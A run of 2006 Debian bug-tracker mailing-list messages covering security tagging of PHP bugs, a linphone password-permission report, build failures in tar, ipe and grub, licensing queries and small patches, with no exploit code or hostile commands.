Processing commands for [EMAIL PROTECTED]: clone 361853 -1 Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 Bug 361853 cloned as bug 361914. clone 361856 -2 Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Bug 361856 cloned as bug 361915. clone 361855 -3 Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Bug 361855 cloned as bug 361916. clone 361854 -4 Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Bug 361854 cloned as bug 361917. reassign -1 php5 5.1.2-1 Bug#361914: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 Bug reassigned from package `php4' to `php5'. reassign -2 php5 5.1.2-1 Bug#361915: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Bug reassigned from package `php4' to `php5'. reassign -3 php5 5.1.2-1 Bug#361916: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Bug reassigned from package `php4' to `php5'. reassign -4 php5 5.1.2-1 Bug#361917: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Bug reassigned from package `php4' to `php5'. tags -1 +security Bug#361914: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 Tags were: security Tags added: security tags -2 +security Bug#361915: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security tags -3 +security Bug#361916: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security tags -4 +security Bug#361917: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security tags 361853 +security Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 Tags were: security Tags added: security tags 361856 +security Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security tags 361855 +security Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security tags 361854 +security Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Tags were: security Tags added: security thank you Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361913: linphone: passwords stored world-readable
Package: linphone Version: 1.2.0-3 Severity: grave Tags: security Justification: user security hole The accounts information, including CLEAR-TEXT passwords, is stored in $HOME/.gnome2/linphone, which is by default world-readable. It should be in $HOME/.gnome2_private/linphone (or any other path below $HOME/.gnome2_private/), where it will be safe, since $HOME/.gnome2_private/ is mode 0700. sarge does not contain linphone. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (200, 'experimental') Architecture: i386 (x86_64) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.15-deb1-64bit Locale: LANG=fr_LU.UTF-8, LC_CTYPE=fr_LU.UTF-8 (charmap=UTF-8) Versions of packages linphone depends on: ii libart-2.0-2 2.3.17-1Library of functions for 2D graphi ii libatk1.0-0 1.10.3-1The ATK accessibility toolkit ii libbonobo2-0 2.10.1-1Bonobo CORBA interfaces library ii libbonoboui2-0 2.10.1-2The Bonobo UI library ii libc62.3.6-1 GNU C Library: Shared libraries an ii libcairo21.0.2-3 The Cairo 2D vector graphics libra ii libfontconfig1 2.3.2-2 generic font configuration library ii libgconf2-4 2.12.1-9GNOME configuration database syste ii libglib2.0-0 2.8.6-1 The GLib library of C routines ii libgnome-keyring00.4.7-1 GNOME keyring services library ii libgnome2-0 2.12.0.1-5 The GNOME 2 library - runtime file ii libgnomecanvas2-02.12.0-2A powerful object-oriented display ii libgnomeui-0 2.12.1-1The GNOME 2 libraries (User Interf ii libgnomevfs2-0 2.12.2-6GNOME virtual file-system (runtime ii libgtk2.0-0 2.8.12-1The GTK+ graphical user interface ii libice6 6.9.0.dfsg.1-4 Inter-Client Exchange library ii liblinphone1 1.2.0-3 linphone web phone's library (supp ii liborbit21:2.12.4-1 libraries for ORBit2 - a CORBA ORB ii libosip2-3 2.2.2-2 Session Initiation Protocol (SIP) ii libpanel-applet2-0 2.12.3-1library for GNOME 2 panel applets ii libpango1.0-01.10.3-1Layout and rendering of internatio ii libpopt0 1.7-5 lib for parsing cmdline parameters ii libsm6 6.9.0.dfsg.1-4 X Window System Session Management ii libx11-6 6.9.0.dfsg.1-4 X Window System protocol client li ii libxcursor1 1.1.3-1 X cursor management library ii libxext6 6.9.0.dfsg.1-4 X Window System miscellaneous exte ii libxi6 6.9.0.dfsg.1-4 X Window System Input extension li ii libxinerama1 6.9.0.dfsg.1-4 X Window System multi-head display ii libxml2 2.6.23.dfsg.2-2 GNOME XML library ii libxrandr2 6.9.0.dfsg.1-4 X Window System Resize, Rotate and ii libxrender1 1:0.9.0.2-1 X Rendering Extension client libra ii linphone-nox 1.2.0-3 web phone ii zlib1g 1:1.2.3-9 compression library - runtime linphone recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#360387: [pkg-wpa-devel] Bug#360387: init script gone
Kel Modderman schrieb am Dienstag, 11. April 2006 um 18:14:06 +1000: What would people say to providing an init daemon for wpasupplicant in a separate binary package, for example, wparoamd or so? Its a lot of overhead providing a 2kb init script in a seperate package. -- Jörg Friedrich There are only 10 types of people: Those who understand binary and those who don't.
Bug#361823: marked as done (libapache2-mod-authz-ldap: undefined symbol ssl_var_lookup)
Your message dated Tue, 11 Apr 2006 10:52:31 +0200 with message-id [EMAIL PROTECTED] and subject line libapache2-mod-authz-ldap: undefined symbol ssl_var_lookup has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: libapache2-mod-authz-ldap Version: 0.26-1 Severity: grave Justification: renders package unusable Trying to get libapache2-mod-authz-ldap to work, spits the following: ftbfs:~/source# /etc/init.d/apache2 start Cannot load /usr/lib/apache2/modules/mod_authz_ldap.so into server: /usr/lib/apache2/modules/mod_authz_ldap.so: undefined symbol: ssl_var_lookup The package is running under sarge and has been recompiled. If the package is not supposed to work in sarge, please, close this report. Thanks. -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.8-1-386 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to en_US) -- Jesus Climent info:www.pumuki.org Unix SysAdm|Linux User #66350|Debian Developer|2.6.15|Helsinki Finland GPG: 1024D/86946D69 BB64 2339 1CAA 7064 E429 7E18 66FC 1D7F 8694 6D69 - ... todos necesitamos creer en algo. - Si, yo también creo... Creo... que me voy a tomar una cerveza. --Sor Trini (Año Mariano) ---End Message--- ---BeginMessage--- I did not notice that the ssl module has to be activated also in apache. Forget about this bug, although it might need a bigger figlet sign pointing to user stupidity. :) -- Jesus Climent info:www.pumuki.org Unix SysAdm|Linux User #66350|Debian Developer|2.6.15|Helsinki Finland GPG: 1024D/86946D69 BB64 2339 1CAA 7064 E429 7E18 66FC 1D7F 8694 6D69 Shall I make us a nice cup of tea, Ma'am ? --Mrs. Mills (The others) ---End Message---
Bug#354847: marked as done (FTBFS: 1.15.1-4 fails 2 tests on amd64)
Your message dated Tue, 11 Apr 2006 01:32:10 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#354847: fixed in tar 1.15.1dfsg-1 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: tar Version: 1.15.1-4 Severity: serious Justification: fails to build from source Hello, tar 1.15.1-4 FTBFS on amd64, because not all tests from /bin/sh ./testsuite are successful. In fact: ## - ## ## Test results. ## ## - ## ERROR: 32 tests were run, 2 failed unexpectedly. 6 tests were skipped. You can read full log at: http://amd64.ftbfs.de/build.php?arch=pkg=tar Thanks, Roberto -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.15 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=UTF-8) (ignored: LC_ALL set to [EMAIL PROTECTED]) Versions of packages tar depends on: ii libc6 2.3.6-1GNU C Library: Shared libraries an tar recommends no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: tar Source-Version: 1.15.1dfsg-1 We believe that the bug you reported is fixed in the latest version of tar, which is due to be installed in the Debian FTP archive: tar_1.15.1dfsg-1.diff.gz to pool/main/t/tar/tar_1.15.1dfsg-1.diff.gz tar_1.15.1dfsg-1.dsc to pool/main/t/tar/tar_1.15.1dfsg-1.dsc tar_1.15.1dfsg-1_i386.deb to pool/main/t/tar/tar_1.15.1dfsg-1_i386.deb tar_1.15.1dfsg.orig.tar.gz to pool/main/t/tar/tar_1.15.1dfsg.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bdale Garbee [EMAIL PROTECTED] (supplier of updated tar package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 11 Apr 2006 17:18:12 +0900 Source: tar Binary: tar Architecture: source i386 Version: 1.15.1dfsg-1 Distribution: unstable Urgency: low Maintainer: Bdale Garbee [EMAIL PROTECTED] Changed-By: Bdale Garbee [EMAIL PROTECTED] Description: tar- GNU tar Closes: 354847 356657 357259 Changes: tar (1.15.1dfsg-1) unstable; urgency=low . * remove the documentation source from this package, since it is licensed under the GFDL with invariant cover texts that upstream is unwilling or unable to to remove, closes: #357259 * remove install-info call from postinst, since it is no longer relevant * include URL for the online version of the tar documentation in the man page * run make with same env vars set as configure to avoid situation where make re-running configure causes rsh to not be found, etc, closes: #356657 * another patch from Goswin to fix test failures on amd64, closes: #354847 Files: d9aa2510ec9cef94addd398ee5bfca65 591 utils required tar_1.15.1dfsg-1.dsc 3bffebc4999cb4ce60d5def1b9743f81 1579038 utils required tar_1.15.1dfsg.orig.tar.gz cd5e38483a68bdf42879ab95b090e456 52321 utils required tar_1.15.1dfsg-1.diff.gz c557f14900f0c9a8a99dc967213586f2 521524 utils required tar_1.15.1dfsg-1_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEO2eyZKfAp/LPAagRAlrQAJ4148tGKD8AM5LthGyc9xiBkVR+DACeKj/e Uk5xKieygqhFjTzmKWSp+KE= =z/nY -END PGP SIGNATURE- ---End Message---
Bug#357955: FTBFS: b-d libmysqlclient14-dev no longer exists
libmysqlclient14-dev no longer exists in unstable; you have to move to version 15. As noted in #357069, you just need to remove the build dependency since it's unneeded. Thijs signature.asc Description: This is a digitally signed message part
Bug#357259: marked as done (tar: GFDL documentation with unmodifiable sections)
Your message dated Tue, 11 Apr 2006 01:32:10 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#357259: fixed in tar 1.15.1dfsg-1 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: tar Version: 1.15.1-4 Severity: serious From the tar info manual: Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation; with the Invariant Sections being GNU General Public License, with the Front-Cover Texts being A GNU Manual, and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled GNU Free Documentation License. (a) The FSF's Back-Cover Text is: You are free to copy and modify this GNU Manual. Buying copies from GNU Press supports the FSF in developing GNU and promoting software freedom. Please try to obtain permission from upstream to delete the unmodifiable sections, otherwise you will have to remove the whole manual. :-( Note that there is something strange with the manual, as the GPL is not actually included AFAICS; this seems to be an upstream mistake. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.4.32 Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Versions of packages tar depends on: ii libc6 2.3.6-3GNU C Library: Shared libraries an tar recommends no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: tar Source-Version: 1.15.1dfsg-1 We believe that the bug you reported is fixed in the latest version of tar, which is due to be installed in the Debian FTP archive: tar_1.15.1dfsg-1.diff.gz to pool/main/t/tar/tar_1.15.1dfsg-1.diff.gz tar_1.15.1dfsg-1.dsc to pool/main/t/tar/tar_1.15.1dfsg-1.dsc tar_1.15.1dfsg-1_i386.deb to pool/main/t/tar/tar_1.15.1dfsg-1_i386.deb tar_1.15.1dfsg.orig.tar.gz to pool/main/t/tar/tar_1.15.1dfsg.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bdale Garbee [EMAIL PROTECTED] (supplier of updated tar package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 11 Apr 2006 17:18:12 +0900 Source: tar Binary: tar Architecture: source i386 Version: 1.15.1dfsg-1 Distribution: unstable Urgency: low Maintainer: Bdale Garbee [EMAIL PROTECTED] Changed-By: Bdale Garbee [EMAIL PROTECTED] Description: tar- GNU tar Closes: 354847 356657 357259 Changes: tar (1.15.1dfsg-1) unstable; urgency=low . * remove the documentation source from this package, since it is licensed under the GFDL with invariant cover texts that upstream is unwilling or unable to to remove, closes: #357259 * remove install-info call from postinst, since it is no longer relevant * include URL for the online version of the tar documentation in the man page * run make with same env vars set as configure to avoid situation where make re-running configure causes rsh to not be found, etc, closes: #356657 * another patch from Goswin to fix test failures on amd64, closes: #354847 Files: d9aa2510ec9cef94addd398ee5bfca65 591 utils required tar_1.15.1dfsg-1.dsc 3bffebc4999cb4ce60d5def1b9743f81 1579038 utils required tar_1.15.1dfsg.orig.tar.gz cd5e38483a68bdf42879ab95b090e456 52321 utils required tar_1.15.1dfsg-1.diff.gz c557f14900f0c9a8a99dc967213586f2 521524 utils required tar_1.15.1dfsg-1_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEO2eyZKfAp/LPAagRAlrQAJ4148tGKD8AM5LthGyc9xiBkVR+DACeKj/e Uk5xKieygqhFjTzmKWSp+KE= =z/nY -END PGP SIGNATURE- ---End Message---
Bug#360843:
Wrong. The use of Replaces is a mandatory *part* of the fix. You don't move a file from one package to another without using Replaces. You're assuming that those manpages are to be moved from modutils to manpages-dev. But they're not. joey's fix was to disable those manpages in manpages-dev since modutils contains them since I don't know when. So, no move, no Replaces. Thomas -- Feel free - 10 GB Mailbox, 100 FreeSMS/Monat ... Jetzt GMX TopMail testen: http://www.gmx.net/de/go/topmail -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361929: grub - grub-install uses tools from /usr
Package: grub Version: 0.97-5 Severity: serious /sbin/grub-install uses tools which are location in /usr/bin. This is a FHS violation, as tools in /bin and /sbin have to work without /usr. Bastian -- The face of war has never changed. Surely it is more logical to heal than to kill. -- Surak of Vulcan, The Savage Curtain, stardate 5906.5 signature.asc Description: Digital signature
Bug#356853: Scalable LaTeX font: Licensing question regarding ae fonts
Grüezi, I assume that I am right in attributing the ae fonts collection for LaTeX to you? While doing a license cleanup in teTeX and TeXLive, I noticed that there is a small problem with this package. It contains a copy of the GPL which probably indicates that it is intended to be released under that license. However, this is not sufficient to put a work under GPL; instead one has to follow the procedure described in the text: Namely putting a short GPL notice into each file, or instead listing all files and saying they are all under GPL. I would be grateful if you could clarify this. Since we're both in Zurich, you're welcome to give me a phone call at 044-635-5536 (work hours) or at home (043-5393706). Merci vielmal, Regards, Frank -- Frank Küster Single Molecule Spectroscopy, Protein Folding @ Inst. f. Biochemie, Univ. Zürich Debian Developer (teTeX)
Bug#361931: tar - FTBFS: cd: doc: No such file or directory
Package: tar Version: 1.15.1dfsg-1 Severity: serious There was an error while trying to autobuild your package: Automatic build of tar_1.15.1dfsg-1 on debian-31 by sbuild/s390 85 [...] make[2]: Entering directory `/build/buildd/tar-1.15.1dfsg' Making all in doc /bin/sh: line 11: cd: doc: No such file or directory make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/build/buildd/tar-1.15.1dfsg' make[1]: *** [all] Error 2 make[1]: Leaving directory `/build/buildd/tar-1.15.1dfsg' -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#356745: NMU
Hello, NMU of this package has been made to DELAYED/5. So you still have 5 days to override my upload. -- Julien Danjou .''`. Debian Developer : :' : http://julien.danjou.info `. `' http://people.debian.org/~acid `- 9A0D 5FD9 EB42 22F6 8974 C95C A462 B51E C2FE E5CD signature.asc Description: Digital signature
Bug#350493: marked as done (Subject: python-hid: Python bindings are virtually unusable)
Your message dated Tue, 11 Apr 2006 03:47:08 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#350493: fixed in libhid 0.2.15+20060325-2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: python-hid Version: 0.2.12-1 Severity: grave Justification: renders package unusable The SWIG interface file in libhid 0.2.12-1 does not properly handle conversion of Python string and list objects into buffer/length pairs. This means that nearly all of the functions which pass HID path arrays or binary buffers will not work (resulting in TypeErrors, or crashing the interpreter). Upstream SVN (post 0.2.15) has fixes for all of the functions currently known to be broken. -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.12-11-686 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages python-hid depends on: ii libc62.3.2.ds1-22GNU C Library: Shared libraries an ii libhid0 0.2.12-1userspace USB HID access library ii libusb-0.1-4 2:0.1.10a-9.sarge.1 userspace USB programming library ii python 2.3.5-2 An interactive high-level object-o -- no debconf information ---End Message--- ---BeginMessage--- Source: libhid Source-Version: 0.2.15+20060325-2 We believe that the bug you reported is fixed in the latest version of libhid, which is due to be installed in the Debian FTP archive: libhid-dev_0.2.15+20060325-2_i386.deb to pool/main/libh/libhid/libhid-dev_0.2.15+20060325-2_i386.deb libhid0_0.2.15+20060325-2_i386.deb to pool/main/libh/libhid/libhid0_0.2.15+20060325-2_i386.deb libhid_0.2.15+20060325-2.dsc to pool/main/libh/libhid/libhid_0.2.15+20060325-2.dsc libhid_0.2.15+20060325-2.tar.gz to pool/main/libh/libhid/libhid_0.2.15+20060325-2.tar.gz python-hid_0.2.15+20060325-2_i386.deb to pool/main/libh/libhid/python-hid_0.2.15+20060325-2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Arnaud Quette [EMAIL PROTECTED] (supplier of updated libhid package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Mon, 10 Apr 2006 14:42:52 +0200 Source: libhid Binary: libhid0 libhid-dev python-hid Architecture: source i386 Version: 0.2.15+20060325-2 Distribution: unstable Urgency: low Maintainer: martin f. krafft [EMAIL PROTECTED] Changed-By: Arnaud Quette [EMAIL PROTECTED] Description: libhid-dev - userspace USB HID development files libhid0- userspace USB HID access library python-hid - Python wrapper for USB HID access library Closes: 345190 350493 Changes: libhid (0.2.15+20060325-2) unstable; urgency=low . * forgot to close the fixed python binding bug (closes: Bug#350493) * build on GNU/kFreeBSD as also been fixed upstream in svn (closes: Bug#345190) Files: ce221ecd45bcf298802de3dd733e76ce 700 libs optional libhid_0.2.15+20060325-2.dsc de370a7ed1a9aaa58092af9c51222c9a 537342 libs optional libhid_0.2.15+20060325-2.tar.gz d91c06813ca315577f08a38814392da9 40732 libdevel optional libhid-dev_0.2.15+20060325-2_i386.deb 763ade8e5c26740fd850acd593ae82f6 28606 libs optional libhid0_0.2.15+20060325-2_i386.deb 9157cf0de192d7989979f01e971e1b86 42572 python optional python-hid_0.2.15+20060325-2_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEO4WA22QUyiBN3xsRAh+2AKCs8veq+smrymW5JfKKNxYzOIekOACePaRd l4vzukO+K8BJRxemX9iu8vw= =Ah21 -END PGP SIGNATURE- ---End Message---
Processed: severity of 316180 is grave, tagging 316180
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.9.15 severity 316180 grave Bug#316180: luxman: Does not start Severity set to `grave'. tags 316180 + confirmed Bug#316180: luxman: Does not start There were no tags set. Tags added: confirmed End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361937: libsasl2: DIGEST-MD5 Pre-Auth DoS found in 2.1.18, likely to also be in 2.1.19 and 2.1.20
Package: libsasl2 Version: 2.1.19-1.5 Severity: serious Tags: security Justification: Security problem Please see http://labs.musecurity.com/advisories/MU-200604-01.txt for more information. Regrads, Sven -- System Information: Debian Release: 3.1 APT prefers stable APT policy: (990, 'stable'), (400, 'experimental'), (90, 'testing'), (50, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.11.12-incase Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages libsasl2 depends on: ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libdb4.24.2.52-18Berkeley v4.2 Database Libraries [ Versions of packages libsasl2 recommends: ii libsasl2-modules 2.1.19-1.5 Pluggable Authentication Modules f -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361943: ipe: FTBFS (amd64): format '%d' expects type 'int', but argument 3 has type 'size_t'
Package: ipe Version: 6.0pre26-2 Severity: serious Tags: patch When building 'ipe' on amd64/unstable, I get the following error: make[2]: Entering directory `/ipe-6.0pre26/src/ipetopng' g++ -c -pipe -O2 -D_REENTRANT -Wall -W -Werror -DQT_NO_CAST_FROM_ASCII -DQT_NO_DEBUG -DQT_GUI_LIB -DQT_CORE_LIB -I/usr/share/qt4/mkspecs/linux-g++ -I. -I/usr/include/qt4/QtCore -I/usr/include/qt4/QtGui -I/usr/include/qt4 -I../include -I../ipemodel -I../ipecanvas -I../../build/moc/ipetopng -I. -o ../../build/obj/ipetopng/ipetopng.o ipetopng.cpp cc1plus: warnings being treated as errors ipetopng.cpp: In function 'int topng(const char*, const char*, int, double)': ipetopng.cpp:77: warning: format '%d' expects type 'int', but argument 3 has type 'size_t' make[2]: *** [../../build/obj/ipetopng/ipetopng.o] Error 1 make[2]: Leaving directory `/ipe-6.0pre26/src/ipetopng' With the attached patch 'ipe' can be compiled on amd64. Regards Andreas Jochens diff -urN ../tmp-orig/ipe-6.0pre26/src/ipetopng/ipetopng.cpp ./src/ipetopng/ipetopng.cpp --- ../tmp-orig/ipe-6.0pre26/src/ipetopng/ipetopng.cpp 2005-12-14 04:45:59.0 + +++ ./src/ipetopng/ipetopng.cpp 2006-04-11 08:24:57.0 + @@ -73,7 +73,7 @@ } if (pageNum 1 || pageNum int(doc-size())) { fprintf(stderr, - The document contains %d pages, cannot convert page %d.\n, + The document contains %ld pages, cannot convert page %d.\n, doc-size(), pageNum); delete doc; return 1; -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#323815: bzflag: shoots through other players
Hi Tim, There are reports saying that this bug still exists after your latest upload. Can you confirm this? Is this problem specific to amd64 now? -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#331661: extensions/*.jar ship without source code, shipped jar files are installed
Hello, Don's analysis of this bug is absolutely correct; we can't ship .jar files in main that don't have corresponding source that can be rebuilt as needed for bugfixing; including in the source package. Is anything being done for this bug? -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#334697: apt-listbugs does not show several grave/serious bugs
tags 334697 -fixed severity 334697 serious thanks On Tue, Apr 11, 2006 at 04:52:28PM +0900, Kenshi Muto wrote: I noticed maintainer's cron script at osdn.d.o.j had stopped since a long time ago by wrong permission. I fixed it and hope this bug is solved. I'm afraid I don't think apt-listbugs is releasable as long as it depends on this external source for bug indices. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#357456: error in postinst script
severity 357456 important thanks This is a policy violation, but it doesn't appear to be a release-critical one per se; the abort-upgrade target is only ever called if there's another bug in a future version of the package. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ signature.asc Description: Digital signature
Bug#358135: dvilib2: directory /usr/share/DVIlib2 is missing in testing version of the package
clone 358135 -1 reassign -1 vflib3-dev 3.6.13-3 severity -1 serious retitle -1 vflib3-dev: missing dependencies on libttf-dev and libt1-dev for .la files tags -1 patch thanks This is actually two bugs. One is that bits of the tex-guy build are failing, and nothing is trapping the errors, so parts of the package are silently lost. The other is that vflib3-dev is missing a dependency on two -dev packages, which is what causes the errors that tex-guy is silently ignoring. Attached is a patch for this second issue. I don't think I have the patience to go through and try to fix up tex-guy's build rules to propagate errors, though; instead, I'm planning to remove tex-guy from testing pending resolution of this bug. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ diff -Nru /tmp/PWiIcwmXAW/vflib3-3.6.13/config.guess /tmp/y69NQvePhe/vflib3-3.6.13/config.guess --- /tmp/PWiIcwmXAW/vflib3-3.6.13/config.guess 2006-04-11 02:16:54.0 -0700 +++ /tmp/y69NQvePhe/vflib3-3.6.13/config.guess 2006-04-11 02:16:54.0 -0700 @@ -3,7 +3,7 @@ # Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, # 2000, 2001, 2002, 2003, 2004, 2005 Free Software Foundation, Inc. -timestamp='2005-08-03' +timestamp='2006-02-23' # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by @@ -106,7 +106,7 @@ trap exitcode=\$?; (rm -f \$tmpfiles 2/dev/null; rmdir \$tmp 2/dev/null) exit \$exitcode 0 ; trap rm -f \$tmpfiles 2/dev/null; rmdir \$tmp 2/dev/null; exit 1 1 2 13 15 ; : ${TMPDIR=/tmp} ; - { tmp=`(umask 077 mktemp -d -q $TMPDIR/cgXX) 2/dev/null` test -n $tmp test -d $tmp ; } || + { tmp=`(umask 077 mktemp -d $TMPDIR/cgXX) 2/dev/null` test -n $tmp test -d $tmp ; } || { test -n $RANDOM tmp=$TMPDIR/cg$$-$RANDOM (umask 077 mkdir $tmp) ; } || { tmp=$TMPDIR/cg-$$ (umask 077 mkdir $tmp) echo Warning: creating insecure temp directory 2 ; } || { echo $me: cannot create a temporary directory in $TMPDIR 2 ; exit 1 ; } ; @@ -206,6 +206,9 @@ *:ekkoBSD:*:*) echo ${UNAME_MACHINE}-unknown-ekkobsd${UNAME_RELEASE} exit ;; +*:SolidBSD:*:*) + echo ${UNAME_MACHINE}-unknown-solidbsd${UNAME_RELEASE} + exit ;; macppc:MirBSD:*:*) echo powerppc-unknown-mirbsd${UNAME_RELEASE} exit ;; @@ -764,7 +767,12 @@ echo ${UNAME_MACHINE}-unknown-bsdi${UNAME_RELEASE} exit ;; *:FreeBSD:*:*) - echo ${UNAME_MACHINE}-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` + case ${UNAME_MACHINE} in + pc98) + echo i386-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;; + *) + echo ${UNAME_MACHINE}-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;; + esac exit ;; i*:CYGWIN*:*) echo ${UNAME_MACHINE}-pc-cygwin @@ -772,6 +780,9 @@ i*:MINGW*:*) echo ${UNAME_MACHINE}-pc-mingw32 exit ;; +i*:MSYS_NT-*:*:*) + echo ${UNAME_MACHINE}-pc-mingw32 + exit ;; 